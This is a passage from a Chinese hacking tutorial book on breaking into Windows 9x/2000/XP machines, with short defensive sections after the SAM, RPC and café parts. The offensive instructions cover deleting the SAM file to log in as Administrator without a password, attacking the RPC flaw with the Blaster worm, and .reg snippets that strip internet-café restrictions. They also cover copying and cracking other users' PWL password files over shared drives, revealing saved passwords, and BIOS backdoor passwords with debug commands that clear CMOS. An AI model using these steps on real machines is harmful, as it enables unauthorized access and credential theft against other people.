尽管 SAM 数据库文件受操作系统的保护,但并不是说就没有办法访问 SAM 了,黑客还可以利用 SAM 数据库的
安全隐患对本地计算机进行攻击,因此,SAM 数据库并非固若金汤。虽然黑客不能直接打开它,却可采用其它
途径删除它,这样你的系统便不在密码保护之列了。
· 47 ·
2. 攻击步骤
①如果在一台安装有多个操作系统的机器上,别的系统可以访问 Windows NT/2000 系统文件的所在分区,那
么,SAM 的安全问题就暴露出来了。
例如,我们在一台计算机上同时安装了 Windows 98 和 Windows 2000 两个系统,并且系统分区是 FAT 格式
的分区 C:。
在 Windows 系统中用到的文件分区格式有:FAT16、FAT32、NTFS4、NTFS5 等。其中 Windows 98 等 Windows
9X 系统支持 FAT16 和 FAT32 格式;Windows NT 支持 FAT16 和 NTFS4 格式;Windows 2000/XP/2003 则支持所
有这四种格式。
②这时候,无论是谁,只要首先控制了你的Windows 98 系统,然后在Windows 98 的 C:\winnt\system32\config
下找到 SAM 数据库文件,把 SAM 文件删除或移动到另一个目录,就可以进入你的 Windows 2000 系统。
因为当前的系统是 Windows 98,Windows 2000 系统没有运行,所以可以对 SAM 数据文件进行操作。如果
在本地,也可以用软盘或光盘启动系统后,进入 Windows 2000 所在的系统分区进行操作。 ③再重新启动系统进入 Windows 2000,在登录时使用“Administrator”账号,用户密码为空,然后按回
车键,便能以系统管理员用户 Administrator 身份成功登录 Windows 2000 系统。 可千万别小看这个技巧,某些关键时刻可是能派上大用场的。
3. 消除 SAM 数据库的安全隐患
其实,造成 Windows NT/2000 这一安全隐患的主要原因是
用户账号太集中地存放在了 SAM 文件中。因此,一旦 SAM 文件
被人为改动,系统就将在启动时报告错误并重新启动,实际
上也就是崩溃了。并且 SAM 文件一旦丢失,系统的另一个致
命缺陷——没有校验和恢复 SAM 文件的能力就暴露无遗。因
此,如果我们想要消除这一安全隐患,关键就是要防止人为
改动 SAM 数据库文件。
消除 SAM 数据库安全隐患的方法主要有以下三种:
①在 B I O S 里设置禁止从软盘和光盘启动,然后为进入
BIOS 设置一个密码,别人就不能随意更改 BIOS 里的设置,也
就不能从软盘或光盘启动进入你的硬盘,从而保证了 Windows
2000 系统的安全。
②在一台计算机上只安装一个操作系统,而且把 Windows
NT/2000 的启动分区和系统分区格式化为 NTFS 或 NTFS5。
③将 SAM 文件设置为只读且隐藏,如图 2-2-36 所示。这
样,对于 DOS 命令不是很熟的菜鸟就无法找到这个文件,即
便找到也不知道该如何删除。
这里所述的 SAM 文件存放在 c:\winnt\system32\config 文件夹,是默认系统安装在 C 盘,如果系统安
装在 D 盘,则 SAM 文件存放在 d:\winnt\system32\config 文件夹下。
提示
图2-2-36 将SAM文件设置为只读和隐藏
· 48 ·
2 . 2 . 6 R P C 漏洞的攻防
1. 漏洞描述
Remote Procedure Call(RPC)调用是 Windows 使用的一个协议,提供进程间交互通信,允许程序在远程
机器上运行任意程序。RPC 在处理通过 TCP/IP 进行信息交换过程中,如果遇到畸形数据包,会导致 RPC 服务无
提示地崩溃掉;而且由于 RPC 服务是一个特殊的系统服务,许多应用和服务程序都依赖于它,因此可以造成程
序与服务的拒绝服务。黑客如果要利用这个漏洞,可以发送畸形请求给远程服务器监听的特定 RPC 端口,如 135、
139、445 等任何配置了 RPC 端口的机器。
2. RPC 漏洞攻击
微软公司 2003 年 7 月 16 日发布了 MS03-026 号安全漏洞之后刚好半个月的时间(也就是 8 月初) ,针对 RPC
漏洞攻击的恶性蠕虫病毒冲击波就对全球的计算机发动了大规模的攻击。由于在默认安装情况下用户的 RPC 服
务(135 端口)是开放的,并且是新出的漏洞,很少有用户安装了安全补丁,所以大多数 Windows 系统用户都深
受其害,受到攻击的 Windows 系统大多出现系统蓝屏、重新启动、自动关机等现象。 黑客在实施攻击之前,一般用 RPC 漏洞扫描器先扫描出网络上存在 RPC 漏洞的机器。 直接运行下载的 RPC 漏洞扫描器.exe 文件,即可进入如图 2-2-37 所示的漏洞扫描主界面。 图2-2-37 RPC漏洞扫描器主界面
在开始 IP 和结束 IP 处输入你想要扫描的 IP 地址,让“范围扫描”和“扫描受攻击的服务器”项保持选中
状态,最后点击“扫描”按钮开始扫描。扫描结束,易受攻击的机器便会在下侧列表中显示出来。
结果一栏显示“VULNERABLE(易受攻击的) ”就表示该机器存在 RPC 漏洞。
我们可用 RPC 漏洞扫描器扫描自己的机器是否存在 RPC 漏洞,黑客利用它可以扫描到存在 RPC 漏洞的肉
机以发起攻击。
漏洞扫描出来后,就可以向有 RPC 漏洞的计算机发起攻击,比如使用冲击波病毒向对方开放的 135 端口发
起攻击,使目标计算机产生下列现象:系统资源被大量占用,有时会弹出 RPC 服务终止的对话框,如图 2-2-38
所示,并且系统反复重启,不能收发邮件、不能正常复制文件、无法正常浏览网页,复制粘贴等操作受到严重
影响,DNS 和 IIS 服务遭到非法拒绝等。
提示
· 49 ·
图2-2-38 RPC服务意外终止对话框
3. RPC 漏洞的防范
① 更改 RPC 服务设置。
选择“控制面板”|“管理工具”|“服务” ,双击 Remote Procedure Call(RPC)服务,如图 2-2-39 所示,
把“恢复”选项卡中的第一、二次失败以及后续失败都选为“不操作” (Windows XP 下默认为重新启动计算机) 。
图2-2-39 设置服务失败的计算机反应为不操作
在 Windows XP 系统下,如果出现如图 2-2-38 所示的重新启动计算机的提示时可以立即运行“shutdown -a”
来取消它,这样可以防止系统重新启动。
② 安装微软提供的 RPC 补丁。
用户需要根据自己所用的操作系统下载微软针对 RPC 漏洞提供的补丁。
Windows 2000 简体中文版:
http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9125-6858b759e977/Windows2000-
KB823980-x86-CHS.exe
Windows XP 简体中文版:
http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8d48-85e42de9d2c0/WindowsXP-
· 50 ·
KB823980-x86-CHS.exe
Windows 2000 英文版:
http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-
KB823980-x86-ENU.exe
Windows XP 英文版:
http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-
KB823980-x86-ENU.exe
需要先打上 Windows SP2 以上的补丁才能正常安装 RPC 补丁。
2 .2 .7 突破网吧封锁线
由于网吧上网人群比较复杂,为了便于管理,许多网吧管理员都给电脑装上了各种网吧管理软件,对用户
的使用权限进行了限制,以防止系统被破坏。
1. 现实情况分析
网吧管理软件有很多,如“美萍安全卫士” 、 “还原精灵” 、 “网吧管理专家”等管理软件,功能大体都差不
多,网吧一般都通过以下几种方式实现对系统的保护:
● 开机后自动启动管理软件,用一个虚拟界面代替 Windows 操作界面;
● 不许使用硬盘;
● 不许下载;
● 不许运行程序;
● 不许使用右键;
● 禁止使用注册表编辑器;
● 禁止使用 IE 的 Internet 选项;
● 只能运行网吧管理软件所指定的应用程序;
● 禁止在硬盘上安装程序;
● 禁止在 IE 的地址栏内输入 C 或 D 来访问系统;
● 禁止显示属性的调整。
通过以上设置,这台上网的计算机应该具有了比较高的安全性。但实际情况真是这样吗?
2.寻找漏洞
下面我们来看看如何一步步突破网吧的重重封锁线。
● 破解注册表封锁
由于网吧管理软件在许多功能上的禁止使用(包括禁止使用注册表编辑器)都是通过对注册表的修改来达
到目的的,因此只要将注册表修改回来,就能取消网管的限制。
打开记事本,输入:
REGEDIT4
(空一行)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTool″=dword:00000000
然后保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg” ,再双击执行该文件,即可解除注
册表封锁。
提示
· 51 ·
这里是针对 Windows 98 注册表, “REGEDIT4”一定要大写,并且“REGEDIT4”中的“T”和“4”之间
一定不能有空格,后面还要空一行。如果网吧机器是 Windows 2000 或 Windows XP 系统,需将“REGEDIT4”
写为“Windows Registry Editor Version 5.00” 。
● 破解硬盘封锁
在网吧上网,最痛苦的事情莫过于不能使用硬盘了,其实要突破硬盘封锁限制也不是什么难事,通过 IE 浏
览器和 QQ 软件就能巧妙地绕过管理软件的控制,从而达
到使用硬盘的目的。
第一种方法:在 IE 浏览器的地址栏中直接输入“C:”
后按“回车”键可以察看硬盘中的资源,这是一种较古
老的方法,可能现在有些高版本的网吧管理软件已经禁
止了这项功能。
第二种方法:在 IE 窗口中点击菜单栏“查看 | 浏览
器栏 | 文件夹” ,这时,主窗口左侧出现资源管理器的窗
口,内有“我的电脑”树形目录结构,如图 2-2-40 所示。
这时你可以根据自己的需要一层层地展开。
第三种方法:点击 IE 菜单栏“文件 | 另存为” ,在弹
出的对话框中用右键点击任一文件夹,选择菜单中的
“资源管理器” ,这样硬盘内容也就显示出来了。
注意这里是点击任意一个“文件夹” ,而不是任意一个“文件” 。
第四种方法:打开 QQ ,随便选择一个好友,点传送文件,就会出现一个文件选择小窗口,这个小窗口就是
一个“微型资源管理器” 。
第五种方法:进入自己的免费邮箱(以 Web 方式收发信) ,选“写邮件” ,再点击“附件”| “浏览”按钮,
如图 2-2-41 所示,这样也可以浏览所在机器的硬盘了。
图2-2-41 在Web邮箱里点击浏览按钮进入硬盘
第六种方法:用“Win 开始+ D”组合键刷新桌面,在网吧管理软件下的桌面实际是网吧管理软件指定的一
个目录,而原桌面则被隐藏了,刷新是对原桌面的刷新,只要不切换其他窗口, “我的电脑”等图标将会一直存
在于桌面之上。打开“我的电脑” ,然后再点工具栏的“向上”按钮,就可以把桌面以窗
口的形式打开了(因为
硬盘是被屏蔽掉的,当打开我的电脑时将什么都看不见) ,此时你可以新建一个如下的文本文档:
提示
图2-2-40 从IE里进入我的电脑树形目录
提示
点击它进入微型资源管理器
· 52 ·
REGEDIT4
(空一行)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoDrives"=dword:00000000
另存为随便一个 R E G 文件就可以了,之后导入(双击)这个文件,等再次开机打开我的电脑时就会看见 C
盘、D 盘了。
这里是针对 Windows 98 注册表, “REGEDIT4”一定要大写,并且“REGEDIT4”中的“T”和“4”之间
一定不能有空格,后面还要空一行。如果网吧机器是 Windows 2000 或 Windows XP 系统,需将“REGEDIT4”
写为“Windows Registry Editor Version 5.00” 。
第七种方法:单击一个没有关联过的文件,会弹出文件打开方式,单击“其他”按钮,这时会弹出打开方
式的对话框,在文件名里输入 C:\ ,同样可以进入系统盘。
这里的关键就是如何访问到本地硬盘,一旦进入了本地硬盘,对一个熟悉 Windows 系统的用户来说,一
台完整的电脑就在面前了。
第八种方法:打开聊天工具 QQ ,然后点击面板上的“TE 浏览器”图标启动 TE 浏览器,一般网管软件所做
的设置只对 IE 管用,但是对其它浏览器一点用都没有。只需在 TE 浏览器的地址栏中输入“C:” ,硬盘的内容便
显示出来了。
这种方法很管用,因为很多网管都忽略了其它的浏览器也一样可以访问硬盘。
另外还可以通过 Winrar“文件”菜单中的“更改驱
动器”进入硬盘,也可以双击一个没有关联过的文件,
在弹出的文件打开方式对话框选择“其它”按钮,然后
在文件名中输入 C:\ 进入硬盘。
● 破解下载封锁
第一种方法:在前面我们已经能够访问硬盘了,通
过“C:\Windows\Start menu”中的快捷方式,可以自
由使用系统的“开始”菜单启动下载程序,或者直接进
入下载软件目录启动下载程序,这样就可以突破 I E 的
下载限制。
第二种方法:当能访问硬盘以后,只需要找到
“Windows\System”目录下将名为“Inetcpl.cpp”的文
件扩展名改为“.cpl” ,这样,就可以运行 IE 浏览器里
的 Internet 选项了。然后只需点击“工具”|“Internet
选项”| “安全”| “自定义级别” ,在“安全设置”的
“下载”栏,将“文件下载”设为“启用” ,如图 2-2-42
所示。然后在需要下载的链接上单击鼠标右键,选择
“目标另存为”保存即可下载。
提示
图2-2-42 在安全设置里启用文件下载功能
· 53 ·
● 破解显示属性封锁
能够进入硬盘后,接着进入到 C:\WINDOWS\SYSTEM 目录下,找到“显示桌面.scf”这个文件并运行,这时
就会回到原来 Windows 的桌面,单击鼠标右键并选择“属性”进入到“显示属性”对话框,在这里就可以很轻
松地修改显示器的分辩率及刷新率了,如图 2-2-43 所示。
图2-2-43 修改显示属性
顺便说一下,由于网吧管理软件的原因,更改显示器时鼠标会停在某个位置不能移动。不过没关系,可
以通过 TAB 键来执行正常的操作,最后调整完成后,鼠标就会恢复正常状态了。
如果是Windows 2000或是Windows XP系统则到C:\Documents and Settings\Administrator\Application
Data\Microsoft\Internet Explorer\Quick Launch 文件夹下面去找相应的显示桌面.scf 文件。 ● 破解程序运行封锁
用惯电脑的人都知道,在开始菜单里面有一个很重要的程序,那就是运行程序,有了这个程序我们可以运
行我们想用的其它程序进一步实现电脑的操作。但是在网吧上网的时候,这个“运行”菜单已经被网吧管理软
件隐藏了,怎么办?
很简单,先打开一个记事本,输入:
REGEDIT4
(空一行)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer ″NoRun″=dword:00000000
然后保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg” ,再执行该文件即可破解程序运行
封锁。
这里是针对 Windows 98 注册表, “REGEDIT4”一定要大写,并且“REGEDIT4”中的“T”和“4”之间
一定不能有空格,后面还要空一行。 (如果网吧机器是 Windows 2000 或 Windows XP 系统,需将“REGEDIT4”
写为“Windows Registry Editor Version 5.00” )。
提示
提示
· 54 ·
● 破解鼠标右键封锁
网页上有那么多漂亮的图片或者自己想要的资料,可兴冲冲地点击鼠标右键想把它保存下来,却发现右键
根本不能用,这时你可以采用下面的方法来解决。
在需要操作的文件或快捷图标上先点住右键不放,再点下左键,然后松开左键,最后松开右键,这时熟悉
的右键菜单便呈现在眼前了。另外,还可以用鼠标左键单击选中文件,同时按住“Shift+F10”键,即可显示出
鼠标的右键菜单。
如果这些方法还不行,可以试试直接保存网页的方法。
● 破解不能安装程序
有时在网吧上网也会遇到一些惊喜,如朋友从远方给你发来一些娱乐性的小程序,下载安装后,却要求重
新启动电脑,但当你重新启动电脑的时候,却发现你的程序没有了,这是网吧安装了《还原精灵》之类的硬盘
还原程序,怎么办?
安装完程序后,选择稍后重启,然后选择“开始”|“关闭系统” ,选中“重新启动计算机” ,然后按住“Shift”
键不放开,同时用鼠标点“是” ,这样系统将不进行初始化自检,并跳过系统引导区,就可以跳过硬盘还原程序
的干扰,当然也就可以看到程序运行的效果了。
● 关闭网吧管理软件
我们知道,管理程序是在 Windows 启动的同
时加载的,如果将这个程序“停止”的话,我们
就可以不再受它的“限制”了。
第一种方法:进入硬盘后,找到 C:\Program
Files\Common Files\Microsoft Shared\MSINFO
目录下的 msinfo32.exe 文件双击运行,这是 Win-
dows 下的系统信息程序,选择运行工具菜单里的
“ 系 统 配 置 实 用 程 序 ” ,选 择 其 中 的“ 启 动 /
Startup”选项卡,就会在程序列表中看到被自动
加载的程序,如图 2-2-44 所示。
在这里你可以根据需要修改系统的启动文件
和配置文件,也可以禁止某些启动程序的运行,
如取消网吧管理软件的运行(去掉程序前面的
钩) ,点击“确定”之后,会弹出窗口询问是否重
启,选择“是”重启以后,就可以毫无限制地使
用电脑了。
这种方法适用于 Windows 98 和 Windows XP 系统,对于 Windows 2000 系统则需要在网上下载一个用
Windows XP 剥离出来的可以在 Windows 2000 下使用的系统配置程序。
第二种方法:进入硬盘后,找到网吧管理软件的目录,运行 uninstall.exe,可以删除网吧管理软件的大
部分文件,在下次机器重启后,此软件将被删除。
如果网吧管理软件屏蔽了直接运行文件功能,可以单击鼠标左键,选中找到的反安装文件,按键盘上的
CTRL+C 组合键,复制该文件,再进入“C:\WINDOWS\Start Menu\Programs\ 启动”文件夹,按 CTRL+V 粘贴反安
装文件。重新启动机器,系统会自动执行反安装文件,网吧管理软件同样被删除了。 图2-2-44 系统配置实用程序中的启动列表显示
提示
· 55 ·
第三种方法:从网上下载 Windows 修改工具之类的软件安装硬盘并运行,运行之后你就可以根据自己的需
要进行修改了。
● 破解 QQ 聊天记录的封锁
在网吧上网,机器不可能固定,聊天记录只能保存在机器上,下一个人来上网,很有可能偷窥到你的聊天
记录,所以我们在离开时必须清除聊天记录。
第一种方法:前面我们已经知道进入硬盘的方
法,这时找到 QQ 软件的安装目录,如 C:\Program
Files\Oicq\ 你的号码( 也可能是 C : \ P r o g r a m
Files\Tencent\QQ\ 你的号码),将你的号码目录全
部删除,这样别人也就不能查看到你的聊天记录了。
第二种方法:前一种方法虽然可以删除聊天记
录,但是当你下一次到另一台机器上网时,你的所有
QQ 个人信息、好友分组、聊天记录、系统设置、聊
天室设置等全都没有,当好友很多时,相互之间可能
还会混淆,分不清谁是谁了。其实你可以采用一款叫
爱 Q 精灵的小软件,它只有一个 EXE 文件,很方便在
网吧使用,因为很多网吧管理软件会自动删掉你保
存下来的文件,下载时可以选择“直接运行” ,如图
2-2-45 所示。
爱 Q 精灵是一款 QQ 记录网络备份器,可以让用户将 QQ 的个人信息、个人设置、好友分组、聊天记录等数据
上传到用户的邮箱中,并可以从邮箱中将上传的数据重新下载下来。用户注册完成,设置好 QQ 所在的目录路径、
邮箱地址 / 密码,以及需要上传和下载数据的种类等信息后,爱 Q 精灵就会自动工作,备份完成,它还会询问
你是否删除本地计算机的记录。点击“是” ,即可删除聊天记录。
当然你也可以采用 E 名片中的 QQ 随身行功能,在自己的 e 名片中保存 QQ 个人信息、好友分组、聊天记录、
系统设置、聊天室设置等;备份完成并且可以自动清除电脑上的 Q Q 聊天记录,同样达到保密的目的。
● 没有软驱怎么办
在网吧上网,机器往往没有配软驱,我们可以采用发邮件的方式,但是邮件能支持的附件最大也不过十几
M,如果你的附件很大时,可以采用网络硬盘,如 21 世纪驱动网络硬盘,它最大可以支持
200M,你可以随时随
地存储和管理你的个人文件,并且还可与“世纪驱动”网内部的所有会员实现文件的共享。 如果你觉得这些方法对于你来说有些复杂,可以进入以下一些网站进行在线破解: 网吧杀手:http://bbs4.xilubbs.com/cgi-bin/bbs/cover?forum=ok238
在线一方网吧实验室:http://chaille.8u8.com/wb/wb.htm
在线破解:http://chaille.8u8.com/pj/zxpj.htm
当然,除了这几个网站,还有许多,有兴趣的朋友可以到网上去搜一搜,不过要提醒一句,知道了这些破
解方法,千万不要用来干坏事。
3.漏洞解决方法
其实,上面所述的一些漏洞我们可以从系统本身禁止,如:
① 禁止其它类的浏览器(如腾讯的浏览器)在地址栏输入 C :进入系统盘进行修改。 ② 禁止系统内部显示隐藏文件,这样可防止修改和删除开机文件、系统文件。
③ 系统内部禁止 REG 文件的导入。
④ 禁止各类压缩软件从地址栏输入 C:进入系统盘进行修改。因为很多的网吧电脑都安装了 WinZip 等压
缩工具软件。
⑤ 禁止网上下载的 EXE 文件直接运行,这是最大的隐患。
图 2-2-45 爱 Q精灵运行界面
· 56 ·
上面这些工作都是尽量想办法禁止用户进入系统盘修改文件,经过了耐心细致的设置,再加上以前管理软
件的安全设置,网吧的电脑应该可以说是很安全了。
2.3 W indow s密码破解
一般有两种通用的做法:一是从存放许多常用密码的数据库中,逐一取出密码尝试;另一种做法是设法偷
走系统的密码文件,如 E-mail 欺骗,然后用专门的工具软件破解这些经过加密的密码。 下面我们就来看看黑客是如何获取自己想要的密码的。
2.3.1 破解 Windows 9x的共享密码
当用扫描器工具扫描到设置了共享的主机后,如果再打开该共享驱动器或目录,系统提示需要用密码来访
问,这时可以使用一些软件来破解它。
PQwak 就是这么一款软件,它是一款绿色软件,无需安装,大小只有 10K,但破解(或绕过) “网上邻居”中
共享目录密码的速度却很快,如图 2-3-1 所示。
图 2-3-1 使用 Pqwak破解密码
使用方法:将“IP”和“Share(共享文件名) ”分别填入对应的文字框中,然后点击“Crack”按钮开始破
解,很快密码便会显示出来。
除了 Pqwak 这个经典工具以外,还可以使用另外一种网上邻居共享密码破解器(Netpass)对共享密码进行
破解,这个工具的破解速度同样非常迅速,如图 2-3-2 所示。
图2-3-2 NetPass的运行主界面
· 57 ·
这里需要输入对方主机名、共享文件夹名,如果不知道主机名,可以利用某些共享扫描工具提供的从
IP 地址转换为主机名的功能,如图 2-3-3 所示的网络刺客Ⅱ软件提供的“IP ←→主机名”相互转换工具。
图2-3-3 网络刺客Ⅱ提供的转换工具
2 . 3 . 2 如何对 W i ndow s 9 x 的 *.P W L 文件实施攻击
在传授下面这些技巧之前,笔者首先声明:尽管下面的这些技巧很灵,并且这些技巧笔者一般情况下
是秘不示人的,现在拿出来与大家分享,但切记:千万不要用来干坏事!
下面我们首先来看看 *.pwl 文件(其中 * 表示某位用户名)中通常可能包含些什么样的数据。
● 登录 Windows 的用户名和密码。
● 使用电话拨号(Dial-up)上网的用户名和密码。
● 进入某些网站的用户名和密码,如购物网站、金融机构、Web 信箱⋯⋯等。
● 进入网上邻居的用户名和密码
1. 本地解除系统密码
在登录界面直接点击“取消”按钮进入 Windows 9X 系统,系统随后启动的部分需要密码才能进行的服务将
无法正常使用。其实,破解这个“初级的”安全
保密问题的方法实在是太多了。
下面就介绍一种常用的删除密码的方法:
① 首先删除 Windows 目录下的“*.Pwl”密
码文件及“C:\Windows\Profiles\Profiles”
子目录下的所有个人信息文件;
② 然后重新启动 Windows 9X 系统,系统会
弹出一个不包含任何用户名的密码设置框,无需
输入任何内容,直接单击“确定”按钮,Windows
98 密码即可被解除。
③ 另外还可在本地电脑运行 007WASP 软件
获取 *.pwl 中的密码,如图 2-3-4 所示。
图2-3-4 007WASP的运行主界面
· 58 ·
007WASP 程序会自动识别当前登录用户和密码文件,然后只需点击“Analyze Password File”按钮,即
可将 Windows 操作系统密码清单(*.PWL)内的各项程序使用者名称和密码显示于界面上。 007WASP 程序必须要在本地电脑中运行才可以得到对方密码。
007 Write All Stored Passwords (WASP)是可以将 Windows 操作系统密码清单(*.PWL)中的密码显示出
来的软件.
2. 本地系统密码远程破解
要远程获取 Windows9x 的密码文件,必须要进到目标机器的 C 盘,才有办法进入到 Windows 目录下获取 *.pwl
文件,所以我们需要先用扫描工具扫描出设置了 C 盘共享的机器。
我们在前面的 2.2.1 节中已经讲述了使用 Shed 扫描
出设置了共享机器的方法,类似的工具很多,如 NetBrute
Scanner 就是一个很不错的扫描工具。
NetBrute Scanner 可以自动将运行 Windows、且将磁盘
共享出来的电脑自动显示出来,如图 2-3-5 所示。
注意,这里必须是对方电脑将 C 盘设置为共享,即便
有密码还可以使用第 2.3.1 节介绍的方法进行破解,但是
如果对方根本就没有共享 C 盘,就不能远程获取 *.pwl 文
件,当然就更谈不上破解了。
在利用黑客工具软件进入目标电脑的 C 盘后,将目标电
脑中的所有“*.Pwl”文件复制到自己的电脑,就可以使用
专用的工具进行破解了。
这里以很著名的 Pwltools 工具为例来详细讲解如何使用
工具破解 Windows 9x 密码,其运行主界面如图 2-3-6 所示。
图2-3-6 Pwltools的运行主界面
提示
图2-3-5 NetBrute Scanner的运行主界面
提示
· 59 ·
如果在 Windows 9x 机器上运行 Pwltools,在主界面的右侧“cached passwords”文本框里就可看到当前
登录用户的其他密码,包括拨号上网密码、WEB 邮箱密码,进入网上邻居的密码。
如果想要查看其它用户除登录密码以外的密码,则可以保持“PWL file”一栏为空,输入该用户名及密码,
然后点击“CheckPassword”按钮即可。
前面两项可以作为本地破解 PWL 中的密码。下面才是真正的对获取的 PWL 文件进行破解。 对于从另外一台机器获取过来的 PWL 文件,如果知道登录密码,则可以点击“Browse”按钮选择 PWL 文件后
调整用户名,以适应已知的登录密码,最后点击“CheckPassword'”按钮即可破解出登录密码以外的一些密码。
如果什么都不知道,只是获得一个 PWL 文件,这种情况最多,这时要用到 PWLtools 的功能。点击“Browse”
按钮选择获得的 PWL 文件后,不断调整用户名,然后采用字典破解或暴力破解,点击“SearchPassword”按钮
即可开始进行破解。
Pwltools 是黑客最喜欢使用的破解 PWL 文件中所包含密码的工具,只是网上不容易找到免费版本,一
般是 Demo 版本,最多只能跑 4 位数的密码。
2 .3 .3 查看 O E 中保存的密码
大家都知道,OE 有记忆用户邮箱密码的功能,有些用户喜欢利用这一功能方便下次收信,从而免去每次收
邮件时都需手工输入密码的繁琐。如果只有一个邮箱还好,如果有多个邮箱,保存密码后确实能省去不少麻烦,
但恰恰是这一点,给了黑客们机会。
保存的密码一般以“*”号的方式显示在密码框里,黑客可以利用一些看“*”软件来查看,
除了我们在 1.2.2
节中所讲的 SnadBoy’s Revelation 可以查看“*”号后面的密码外,还可以使用其它一些专门看“*”的软件,
如水晶情缘工作室制作的星号密码查看器,如图 2-3-7 所示。
图2-3-7 用星号密码查看器查看OE中保存的密码
运行了密码查看器后,它便会浮于桌面上,光标移到哪个地方,在它下面的框里便会显示相应区域的内容,
提示
· 60 ·
当光标移动到密码的“*****”处便会将“*****”的真实字符显示出来。
水晶情缘的密码查看器可以说是世界上最小巧的星号密码查看器了,自身程序大小还不到 6K ,可以查
看 Windows 中以“*****”显示的密码窗口中的实际内容,支持 Windows 95/98/ME/NT/2000/XP/2003 各种操作
系统,是黑客常备工具之一。
2 . 3 . 4 破解 B IO S 密码
这时需要以下一些办法来清除 BIOS 密码:
(1)万能密码法
对 AwardBIOS,可以试试下面的“万能”密码:
AWARD_SW,j262,HLT,SER,SKY_FOX,BIOSTAR,ALFAROME,lkwpeter,j256,AWARD?SW,LKWPETER,Syxz,
aLLy,589589,589721,awkward,wantgirl,dirrid,eBBB,h996,wnatgirl,CONCAT 等 对 AMIBIOS,试试下面的“万能”密码:
AMI,BIOS,PASSWORD,HEWITTRAND,AMI?SW,AMI_SW,LKWPETER,A.M.I.等。
这种方法适合于较老的机型。如果在 CMOS 设置中的 Security Option 选项设置是 always,那么,这种
方法是除了开箱跳线之外唯一的办法了。
(2)Debug大法
如果在 CMOS 设置中的 Security Option 选项设置是“setup” (进入 CMOS 设置时才需要密码,我们想要进
入 CMOS 更改某些设置) ,可以用软盘启动进入系统,然后加以破解。运行 debug,然后键入: (注意,针对不同
版本,不同厂商的 BIOS,有不同的清除方法)
① -o70 21
-o71 20
-quit
② -o 70 2E
-o 71 0
-quit
③ -o 70 16
-o 71 16
-quit
④ -o 70 FF
-o 71 17
-quit
⑤ -o 70 10
-o 71 0
-quit
修改完成以后,重新启动计算机,不用输入密码就可直接进入 CMOS 进行修改了。 (有的重新启动时提示 CMOS
校验错误,按 Del 键进入 CMOS SETUP 中发现所有的参数全变成了默认值,重新设好参数后,存盘退出即可)
此法对大多数主板都适用,简单有效。
提示
提示
· 61 ·
(3) 使用NU的RESCUE工具软件
可找一台主板相同(当然同样型号的机器也行, BIOS 版本和型号当然也就是一样)但未设口令的机器,然
后利用 NU 软件包中的系统备份程序 RESCUE 生成一个该 CMOS 的备份,再用此备份恢复设了口令的 CMOS,即可轻
松解开该机的 SETUP 口令。启动电脑,即可进入 CMOS 随意设置了。
PCTOOLS 9.0 的组件工具 BOOTSAFE 也有同样功能,我们可以找一台同类型的机器,将 CMOS 信息和引导
区信息备份到空白软盘上,再恢复到欲破 CMOS 密码的计算机。
(4) 使用FlashBios软件
如果当前已经进入对方的电脑,则可以直接进入 DOS 命令行状态(Windows 9x 选择“开始 | 运行” ,在运行
框里输入“command”进入;若是 Windows 2000 则输入“cmd”进入) 。然后根据操作系统的版本,执行相应
的命令。
命令用法: Flashbios [kind]; [kind]可以为 98/2000/xp/2003,如图 2-3-8 所示为清除 Windows 2000 操
作系统的 BIOS 密码。
图2-3-8 FlashBios的运行状态显示
针对不同的操作系统,可采用相应的命令。
Flashbios 98;在 windows 98 下清除 bios 密码;
Flashbios 2000;在 windows 2000 下清除 bios 密码;
Flashbios xp;在 windows xp 下清除 bios 密码;
Flashbios 2003;在 windows 2003 下清除 bios 密码。
当显示“Bios Password Cleaned Sucessed!”时,则表明 BIOS 密码清除成功,重新启动机器就可以直接
进入 CMOS 进行任意设置了。
FlashBios 是目前唯一可以在 Windows 98/2000/xp/2003 下清除 bios 密码的东西,以前好多清除 bios
密码的工具(如 CMOSMENU)都只能在 Windows 98 下使用。
Flashbios 会被一些杀毒软件认为是黑客工具而对其隔离,所以在运行之前要将杀毒工具关闭。
(5)放电大法
如果在 CMOS 设置的 Security Option 选项中设置是“system”或是“Always” ,或者手边没有这些工具,那
就只有放电。这时需要有一定的硬件知识,因为这种情况是需要打开机箱的。
提示
提示
· 62 ·
① 跳线清 CMOS 法。有些主板上有一个跳线是专门用来清除 CMOS 中设置的内容。找到主板说明书(有些厂
商直接将一些跳线图画在面盖的反面) ,找到清除 CMOS 设置的那个跳线,只要短接这个跳线或改变其短接的方
法,CMOS 中的口令就会被清除掉了,因各款主板的操作并不一样,所以具体操作时请参照说明书。
② 直接短路法。如果遇到的主板没有专门用来清 CMOS 的跳线你就可以采用这种方法。因为 CMOS 中的内容
在关机时是通过一块电池来保存的,我们只要在关机时把电池取出来,然后找一截短线将原来放电池地方的正
负极短接,过一段时间 CMOS 中的内容就会被清空了。主板上使用的供电电池大部分是钮扣电池,很好分辨,然
后将电池安装回去即可。
有些电脑在清除 CMOS 后不能正确引导而提示没有操作系统,这是因为在清除 CMOS 的参数设置时 CMOS
中关于硬盘的设置也被清除了,导致系统找不到硬盘从而无法启动。这时只要进入 CMOS 设置自动检测一下
硬盘就可以了。
2 . 3 . 5 破解 O ffi ce 密码
通过前面介绍的方法,我们获得了目标机的一些资料,包括很多的 Office 文档,当要打开这些文档时
却发现这些文档都加了密码,需要密码才能打开。
只要采用一些破解 Office 密码的软件进行破解就行了,下面就跟我来看看黑客是如何破解 Office 密码的吧。
破解 Office 系列文档密码的软件多如牛毛,
最常用的是 ElcomSoft 公司的 AO97PR(Advanced
Office XP Password Recovery ) 。该软件可同时
对微软 Office 系列中的 Word、Excel 及 Access 等
软件所生成的密码进行破解,这就免去了用户逐一
下载、使用各个单独密码破解软件的苦恼,其运行
界面如图 2-3-9 所示。
点击“Open file”按钮
,选择想要破解的
Office 文档,在“Type of Attack”中选择密码
破解方式。然后再在相应类型的选项卡中作相应设
置,最后单击“Start Recovery”按钮
开始破解。
